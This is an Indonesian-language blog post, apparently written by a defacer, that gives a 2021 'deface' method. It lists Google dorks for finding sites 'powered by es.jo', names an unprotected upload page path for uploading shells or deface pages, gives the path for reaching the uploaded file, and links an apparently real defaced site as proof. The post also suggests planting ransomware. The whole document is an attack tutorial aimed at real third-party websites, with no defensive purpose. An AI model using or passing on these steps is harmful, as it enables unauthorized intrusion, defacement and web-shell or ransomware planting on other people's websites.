Deface poc up shell aspx
Assalammualaikum wr.wb,kembali lagi bersama mimin yang burik:V
Disini mimin akan memberikan metode deface terbaru 2021:V
Ok langsung saja kalian siapkan
Bahan:
1.Kuota
2.Sc depes/shell kalian,ransomweb jika perlu:V
3.dork
4.kesabaran yang full:v
Dork:
[●]powered by es.jo
[●]inurl: powered by es.jo
[●]All rights Reserved. Powered by es.jo
[●]powered by es.jo " ©2020
Exploit:
/admin_site/upload/ahmadupload.aspx
Akses:
/admin_site/upload/files/nama filemu
Langkah-langkah:
1.seperti biasa kalian dorking dulu di gugel
Pastekan salah satu ya,jangan semua:V
2.jika sudah masukkan exploitnya dibelakang url target.
Contoh: https://target.com//admin_site/upload/ahmadupload.aspx
3.jika vuln maka akan keluar uploader file,seperti contoh dibawah:
4.jika keluar seperti gambar diatas kalian upload file dulu(.php/.html)
5.jika sudah kalian pencet add.contoh jika file sudah di add
6.jika sudah di add kalian klik upload
7.dan tinggal kalian akses filenya
http://target.com/admin_site/upload/files/nama filemu.html
8.dan website has been defaced
Contoh hasil deface:
https://eaiia.org/admin_site/upload/files/ind.html
Nah seperti itu lah cara deface website metode upload shell aspx.jika masih kurang jelas bisa bertanya di kolom komentar.
Sekian dan terimakasih
Wa'Assalammualaikum wr.wb